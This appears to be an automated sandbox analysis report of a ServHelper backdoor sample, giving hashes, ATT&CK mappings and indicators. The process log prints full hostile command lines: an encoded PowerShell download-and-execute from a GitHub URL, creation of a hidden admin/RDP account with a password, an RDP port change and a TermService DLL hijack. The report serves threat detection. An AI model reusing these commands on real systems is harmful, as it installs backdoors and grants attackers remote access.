servhelper | f7abcbdb4896f995674c927c3e3b46fbf40125c26cc8ebb09d88ee0d71d4a25f

Analysis

max time kernel
146s
max time network
131s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
10-01-2024 12:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

508167b2c34732f05f11f2531b2498a2.exe
Size

5.9MB
MD5

508167b2c34732f05f11f2531b2498a2
SHA1

88f5a4f580243a098662a8c1dd3ea86a60407c81
SHA256

f7abcbdb4896f995674c927c3e3b46fbf40125c26cc8ebb09d88ee0d71d4a25f
SHA512

3b6dd1409a15da49609ce4779c66a08768fa635cb7a8ce3fd6e9a0f56f5055de9c7b09eb9dfad3f542ff6478fd661c8c46e42e1580d4e5311dd465d79fea8c5c
SSDEEP

49152:P8L4dlrb/TkvO90dL3BmAFd4A64nsfJ9uB5q9FbvbhZdGDSj0uBTfA6VzHv3+6kP:P80Du3mAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	3040	powershell.exe
15	3040	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1576	icacls.exe
1476	icacls.exe
284	icacls.exe
544	icacls.exe
792	icacls.exe
324	takeown.exe
2988	icacls.exe
1472	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
1536	Process not Found
1536	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2988	icacls.exe
1472	icacls.exe
1576	icacls.exe
1476	icacls.exe
284	icacls.exe
544	icacls.exe
792	icacls.exe
324	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000014afa-118.dat	upx
behavioral1/files/0x000b000000014ac0-117.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4MR59YJRSFKB7P97FV06.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2720	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00364ef9bc43da01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1804	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2728	powershell.exe
1092	powershell.exe
1508	powershell.exe
1360	powershell.exe
2728	powershell.exe
2728	powershell.exe
2728	powershell.exe
3040	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
484	Process not Found
1536	Process not Found
1536	Process not Found
1536	Process not Found
1536	Process not Found
1536	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2732	508167b2c34732f05f11f2531b2498a2.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeRestorePrivilege	544	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeAuditPrivilege	2720	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeAuditPrivilege	2720	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2536	WMIC.exe
Token: SeAuditPrivilege	2536	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2536	WMIC.exe
Token: SeAuditPrivilege	2536	WMIC.exe
Token: SeDebugPrivilege	3040	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2732 wrote to memory of 2728	2732	508167b2c34732f05f11f2531b2498a2.exe	29
PID 2732 wrote to memory of 2728	2732	508167b2c34732f05f11f2531b2498a2.exe	29
PID 2732 wrote to memory of 2728	2732	508167b2c34732f05f11f2531b2498a2.exe	29
PID 2728 wrote to memory of 2492	2728	powershell.exe	32
PID 2728 wrote to memory of 2492	2728	powershell.exe	32
PID 2728 wrote to memory of 2492	2728	powershell.exe	32
PID 2492 wrote to memory of 2512	2492	csc.exe	31
PID 2492 wrote to memory of 2512	2492	csc.exe	31
PID 2492 wrote to memory of 2512	2492	csc.exe	31
PID 2728 wrote to memory of 1092	2728	powershell.exe	34
PID 2728 wrote to memory of 1092	2728	powershell.exe	34
PID 2728 wrote to memory of 1092	2728	powershell.exe	34
PID 2728 wrote to memory of 1508	2728	powershell.exe	38
PID 2728 wrote to memory of 1508	2728	powershell.exe	38
PID 2728 wrote to memory of 1508	2728	powershell.exe	38
PID 2728 wrote to memory of 1360	2728	powershell.exe	37
PID 2728 wrote to memory of 1360	2728	powershell.exe	37
PID 2728 wrote to memory of 1360	2728	powershell.exe	37
PID 2728 wrote to memory of 324	2728	powershell.exe	94
PID 2728 wrote to memory of 324	2728	powershell.exe	94
PID 2728 wrote to memory of 324	2728	powershell.exe	94
PID 2728 wrote to memory of 792	2728	powershell.exe	93
PID 2728 wrote to memory of 792	2728	powershell.exe	93
PID 2728 wrote to memory of 792	2728	powershell.exe	93
PID 2728 wrote to memory of 544	2728	powershell.exe	92
PID 2728 wrote to memory of 544	2728	powershell.exe	92
PID 2728 wrote to memory of 544	2728	powershell.exe	92
PID 2728 wrote to memory of 284	2728	powershell.exe	91
PID 2728 wrote to memory of 284	2728	powershell.exe	91
PID 2728 wrote to memory of 284	2728	powershell.exe	91
PID 2728 wrote to memory of 1476	2728	powershell.exe	90
PID 2728 wrote to memory of 1476	2728	powershell.exe	90
PID 2728 wrote to memory of 1476	2728	powershell.exe	90
PID 2728 wrote to memory of 1576	2728	powershell.exe	89
PID 2728 wrote to memory of 1576	2728	powershell.exe	89
PID 2728 wrote to memory of 1576	2728	powershell.exe	89
PID 2728 wrote to memory of 1472	2728	powershell.exe	88
PID 2728 wrote to memory of 1472	2728	powershell.exe	88
PID 2728 wrote to memory of 1472	2728	powershell.exe	88
PID 2728 wrote to memory of 2988	2728	powershell.exe	39
PID 2728 wrote to memory of 2988	2728	powershell.exe	39
PID 2728 wrote to memory of 2988	2728	powershell.exe	39
PID 2728 wrote to memory of 648	2728	powershell.exe	87
PID 2728 wrote to memory of 648	2728	powershell.exe	87
PID 2728 wrote to memory of 648	2728	powershell.exe	87
PID 2728 wrote to memory of 1804	2728	powershell.exe	86
PID 2728 wrote to memory of 1804	2728	powershell.exe	86
PID 2728 wrote to memory of 1804	2728	powershell.exe	86
PID 2728 wrote to memory of 2324	2728	powershell.exe	40
PID 2728 wrote to memory of 2324	2728	powershell.exe	40
PID 2728 wrote to memory of 2324	2728	powershell.exe	40
PID 2728 wrote to memory of 632	2728	powershell.exe	85
PID 2728 wrote to memory of 632	2728	powershell.exe	85
PID 2728 wrote to memory of 632	2728	powershell.exe	85
PID 632 wrote to memory of 1616	632	net.exe	84
PID 632 wrote to memory of 1616	632	net.exe	84
PID 632 wrote to memory of 1616	632	net.exe	84
PID 2728 wrote to memory of 1112	2728	powershell.exe	83
PID 2728 wrote to memory of 1112	2728	powershell.exe	83
PID 2728 wrote to memory of 1112	2728	powershell.exe	83
PID 1112 wrote to memory of 2832	1112	cmd.exe	82
PID 1112 wrote to memory of 2832	1112	cmd.exe	82
PID 1112 wrote to memory of 2832	1112	cmd.exe	82
PID 2832 wrote to memory of 2836	2832	cmd.exe	81

C:\Users\Admin\AppData\Local\Temp\508167b2c34732f05f11f2531b2498a2.exe
"C:\Users\Admin\AppData\Local\Temp\508167b2c34732f05f11f2531b2498a2.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4dzo_atp.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2988
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1112
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:632
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1804
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:648
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1472
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1576
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1476
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:284
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:544
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:792
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:324
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:948

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A15.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3A14.tmp"
1⤵
PID:2512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
1⤵
PID:1656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc b3CXVY2c /add
1⤵
PID:960

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc b3CXVY2c /add
1⤵
PID:280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1880

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2120

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2524

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2596

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc b3CXVY2c
1⤵
PID:2680

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc b3CXVY2c
1⤵
PID:2068

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc b3CXVY2c
1⤵
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1752

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2824

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GLTGRJAG$ /ADD
1⤵
PID:2036

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" GLTGRJAG$ /ADD
1⤵
PID:2444

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GLTGRJAG$ /ADD
1⤵
PID:2188

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2196

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2992

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc b3CXVY2c /add
1⤵
PID:2044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
1⤵
PID:1996

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
1⤵
PID:3020

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1816

C:\Windows\system32\net.exe
net start TermService
1⤵
PID:1808

C:\Windows\system32\cmd.exe
cmd /c net start TermService
1⤵
PID:3036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
1⤵
PID:2828

C:\Windows\system32\net.exe
net start rdpdr
1⤵
PID:2836

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
1⤵
PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4dzo_atp.dll

Filesize
3KB

MD5
852fceee854765225af440da6dd6b998

SHA1
a0ed233864a4e4e8487339d363ca5be237c2ceec

SHA256
41d2361bdab9c0d1e9d8f23bf3ab0b80c0bf751565c19116e5d3b9d281abe0db

SHA512
3a24feb3a72bfde32abd1271174c4b2c977a121980e17fdb01eabb14d15d3161dfd839e7b1916f59bc9f49dc45c2de40ee92256c0e4d9d0f14bbc8c0ba0fee1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\4dzo_atp.pdb

Filesize
7KB

MD5
a42c7bb06275ec5eabe0e6137a70fa50

SHA1
8332b6850b1d623747209cf32da0e150d27bb432

SHA256
c1ced9c57344b8022248356f71604486bf206670ce3fe9c1e0d5423678bcc253

SHA512
b0064ea85588983042a207173d8062742522bd6a563d50ac90f97a28982a0c5936fb3a4f1e27eab5c9488229d913bd46cae290ed799d84206aa6d3c67d552c53

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3A15.tmp

Filesize
1KB

MD5
efcc786c0cd25157fcb50e835765f042

SHA1
aa9d1b118327128d84786c1c8ca72945386facd4

SHA256
822297d9e8b8d055b7c13dfd4cc6c3f723204a2ee789afd9322070bdcb25b069

SHA512
a5bfbf76361e00e2148f02e627687fe3425a6df058e4fb3b8d6e52f3ddbd8dccf725ebe4276c6904ad708b5fc48e166c193a3444bc97539efe2be308a2f62c77

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
270KB

MD5
13144c44c393fdba6b07cad953268886

SHA1
88e16c66578501214ad3d0c987f455d577c86900

SHA256
c813ace9784d040a08c2dcbdad0a3058e4cc0b26e090b9460e3738899268e3a2

SHA512
53c5a351acd0e01513c0d2bc388103b5311019ea8861ca50f103c61e1937447fd91301796d3c56105deb1c8cc5beb3baf728490923b176271355307408a0f021

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UJZ6OS8AXZTHKKV9AVV4.temp

Filesize
7KB

MD5
0a591e59cf4438352a003cc70975f37b

SHA1
863529842f73ec6494e51651b4412137ca26c75d

SHA256
367b9f7fa58c40c32c8c47554f7d3963f6040317e4c771003153ef90d2ba3e0d

SHA512
d963369b85df25dfd121c2fc7bfde7797618e59269cf1c0d5502b9e778f5462c658639d76e613f3224a733ddadf2f05b7d6a55f26b7c56a619ab3ea8a5d90b8c

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4dzo_atp.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4dzo_atp.cmdline

Filesize
309B

MD5
93b42f74ef42bc226a3cdd1fac2df189

SHA1
5d70f70c1a445cb52b130250da4b5f771642ccfa

SHA256
056790b9c0a7eaf7ca35ae9487d4a094796d1f7f281b1d88d25866c4c75ed407

SHA512
aa1ba28be2a057465659d55142519b6806b9bbca48ec527614340c4150972ba452bdc6e3a56eef5e142ad784c971224d13884b195ac5cdc5c28db2ccf7894cb2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3A14.tmp

Filesize
652B

MD5
2a7e24815c43a89e01f4473fd7ebf587

SHA1
3fb3a0ef6111fdd370dceaf768f10b5a889dfe47

SHA256
070d40b5c2bf38bfb421d9532f1e462acb7986c59819d15fe53085cbccef7f3b

SHA512
1fffb76f84bcd3e4d49547322c6a7a45de3d0a66452edd22d236632e4b1e517bfe8e68ac324b4f3eb9f344ff68b2081a2756600b9d53753d68e674b8cfb3f32f

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
596ca1d187937a1a2bca34d8c8993f1f

SHA1
bb3dfb10cb06dddc4e58d8b3f5a08b8908378820

SHA256
7fce3b42b061497b14f16421ddafd75d3a56be2ebd081f2bd84157b0166803b7

SHA512
bde56fd03c38274033a8195ba1aba3645cb03821ba18db7b35f6a9062ee20f8df29e9e108a3f887c8bee4b5487ace1bd2e374ef9418aac4460a31437ba075df0

Download Submit
\Windows\Branding\mediasvc.png

Filesize
371KB

MD5
efe2a47918cbda32f63f60d01dd29fc0

SHA1
74a78cf97ab01ffa52c354a866c43caa8d302f29

SHA256
1dbe109a99c9f2e46416ce71a1553900d84c537fdafec427f310c8379d774961

SHA512
aae5d2840c6ca460f9d0e67af0a1a68b05cf85bd173e7ddcdecfeb77ebc87d66b5de4725b8315e295ffb41e040e4350e5a5564b5bc20e679e3d97f29fe99f55c

Download Submit
memory/1092-66-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/1092-64-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/1092-63-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1092-65-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1092-68-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/1092-69-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/1092-70-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1092-67-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/1360-88-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1360-89-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1360-90-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1360-91-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1360-93-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1360-94-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1360-92-0x000000000291C000-0x0000000002983000-memory.dmp

Filesize
412KB

Download
memory/1508-81-0x0000000002B8C000-0x0000000002BF3000-memory.dmp

Filesize
412KB

Download
memory/1508-77-0x0000000002B80000-0x0000000002C00000-memory.dmp

Filesize
512KB

Download
memory/1508-87-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1508-80-0x0000000002B80000-0x0000000002C00000-memory.dmp

Filesize
512KB

Download
memory/1508-79-0x0000000002B80000-0x0000000002C00000-memory.dmp

Filesize
512KB

Download
memory/1508-78-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/1508-76-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-96-0x000007FEED2A0000-0x000007FEEDC3D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-99-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-102-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2728-57-0x000000001BC40000-0x000000001BC72000-memory.dmp

